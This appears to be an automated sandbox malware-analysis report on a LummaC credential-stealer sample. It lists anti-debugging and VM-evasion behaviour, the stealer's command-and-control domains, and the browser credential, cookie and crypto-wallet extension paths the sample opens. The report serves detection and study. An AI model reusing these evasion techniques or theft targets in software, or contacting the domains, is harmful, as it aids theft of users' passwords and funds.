              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0952 second address: 4DA0A2C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D507EA96Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b pushad 0x0000000c movzx ecx, di 0x0000000f mov di, 089Eh 0x00000013 popad 0x00000014 je 00007F3DC14D83AEh 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F3D507EA96Bh 0x00000021 and cx, D54Eh 0x00000026 jmp 00007F3D507EA979h 0x0000002b popfd 0x0000002c pushfd 0x0000002d jmp 00007F3D507EA970h 0x00000032 xor esi, 61FE69C8h 0x00000038 jmp 00007F3D507EA96Bh 0x0000003d popfd 0x0000003e popad 0x0000003f cmp dword ptr [75AF459Ch], 05h 0x00000046 pushad 0x00000047 mov ax, 545Bh 0x0000004b pushfd 0x0000004c jmp 00007F3D507EA970h 0x00000051 or si, 6C28h 0x00000056 jmp 00007F3D507EA96Bh 0x0000005b popfd 0x0000005c popad 0x0000005d je 00007F3DC14F0409h 0x00000063 jmp 00007F3D507EA976h 0x00000068 xchg eax, esi 0x00000069 pushad 0x0000006a mov ch, dl 0x0000006c popad 0x0000006d push eax 0x0000006e jmp 00007F3D507EA96Fh 0x00000073 xchg eax, esi 0x00000074 push eax 0x00000075 push edx 0x00000076 push eax 0x00000077 push edx 0x00000078 pushad 0x00000079 popad 0x0000007a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0A2C second address: 4DA0A32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0A32 second address: 4DA0A4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3D507EA979h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0ABA second address: 4DA0B3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F3D50D0EC6Ah 0x0000000a and si, EA68h 0x0000000f jmp 00007F3D50D0EC6Bh 0x00000014 popfd 0x00000015 popad 0x00000016 push esi 0x00000017 pushfd 0x00000018 jmp 00007F3D50D0EC6Fh 0x0000001d or ch, FFFFFFAEh 0x00000020 jmp 00007F3D50D0EC79h 0x00000025 popfd 0x00000026 pop eax 0x00000027 popad 0x00000028 pop esi 0x00000029 jmp 00007F3D50D0EC77h 0x0000002e pop ebp 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F3D50D0EC75h 0x00000036 rdtsc
              Tries to evade debugger and weak emulator (self modifying code)
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 81878D instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 65E8D7 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 826BA9 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 3948Thread sleep time: -150000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 4268Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: file.exeBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: file.exe, 00000000.00000003.2074780784.000000000574F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
              Source: file.exe, 00000000.00000003.2074780784.000000000574F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
              Source: file.exe, 00000000.00000003.2074780784.000000000574F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
              Source: file.exe, 00000000.00000003.2074780784.000000000574F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
              Source: file.exe, 00000000.00000003.2074780784.000000000574F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
              Source: file.exe, 00000000.00000003.2074780784.0000000005754000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696428655p
              Source: file.exe, 00000000.00000003.2074780784.000000000574F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
              Source: file.exe, file.exe, 00000000.00000003.2155758852.0000000001031000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2156940751.0000000001031000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2156730025.0000000000FCE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: file.exe, 00000000.00000003.2074780784.000000000574F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
              Source: file.exe, 00000000.00000003.2074780784.000000000574F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
              Source: file.exe, 00000000.00000003.2074780784.000000000574F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
              Source: file.exe, 00000000.00000003.2074780784.000000000574F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
              Source: file.exe, 00000000.00000003.2074780784.000000000574F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
              Source: file.exe, 00000000.00000003.2074780784.000000000574F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
              Source: file.exe, 00000000.00000003.2074780784.000000000574F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
              Source: file.exe, 00000000.00000003.2074780784.000000000574F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
              Source: file.exe, 00000000.00000003.2074780784.000000000574F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
              Source: file.exe, 00000000.00000003.2074780784.000000000574F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
              Source: file.exe, 00000000.00000003.2074780784.000000000574F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
              Source: file.exe, 00000000.00000003.2074780784.000000000574F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
              Source: file.exe, 00000000.00000003.2074780784.000000000574F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
              Source: file.exe, 00000000.00000003.2074780784.000000000574F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
              Source: file.exe, 00000000.00000003.2074780784.000000000574F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
              Source: file.exe, 00000000.00000003.2074780784.000000000574F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
              Source: file.exe, 00000000.00000003.2074780784.000000000574F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
              Source: file.exe, 00000000.00000003.2074780784.000000000574F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
              Source: file.exe, 00000000.00000003.2074780784.000000000574F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
              Source: file.exe, 00000000.00000003.2074780784.000000000574F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
              Source: file.exe, 00000000.00000003.2074780784.000000000574F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
              Source: file.exe, 00000000.00000003.2074780784.0000000005754000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: YNVMware
              Source: file.exe, 00000000.00000003.2074780784.000000000574F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
              Source: file.exe, 00000000.00000003.2074780784.000000000574F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
              Source: file.exeBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: file.exe, 00000000.00000003.2074780784.000000000574F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
              Source: file.exe, 00000000.00000003.2074780784.000000000574F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
              Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Hides threads from debuggers
              Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
              Tries to detect sandboxes and other dynamic analysis tools (window names)
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00640F10 LdrInitializeThunk,0_2_00640F10

              HIPS / PFW / Operating System Protection Evasion

              barindex
              LummaC encrypted strings found
              Source: file.exeString found in binary or memory: scriptyprefej.store
              Source: file.exeString found in binary or memory: navygenerayk.store
              Source: file.exeString found in binary or memory: founpiuer.store
              Source: file.exeString found in binary or memory: necklacedmny.store
              Source: file.exeString found in binary or memory: thumbystriw.store
              Source: file.exeString found in binary or memory: fadehairucw.store
              Source: file.exeString found in binary or memory: crisiwarny.store
              Source: file.exeString found in binary or memory: presticitpo.store
              Source: file.exe, 00000000.00000002.2156197184.000000000083E000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: file.exe, 00000000.00000003.2114154432.00000000010A7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2155414603.00000000010A9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2114026458.00000000010A6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2150400482.00000000010A8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2124998793.00000000010A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 6648, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Found many strings related to Crypto-Wallets (likely being stolen)
              Source: file.exeString found in binary or memory: Wallets/Electrum-LTC
              Source: file.exe, 00000000.00000003.2086942025.00000000010B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
              Source: file.exe, 00000000.00000003.2075150921.0000000001095000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Edge/Default/Extensions/Jaxx Liberty
              Source: file.exe, 00000000.00000003.2061774988.00000000010A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
              Source: file.exe, 00000000.00000003.2075150921.0000000001095000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
              Source: file.exe, 00000000.00000003.2062200123.000000000109A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance{
              Source: file.exe, 00000000.00000003.2086942025.00000000010B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: file.exe, 00000000.00000003.2086942025.00000000010B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
              Source: file.exe, 00000000.00000003.2062200123.000000000109A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Ledger LiveG
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
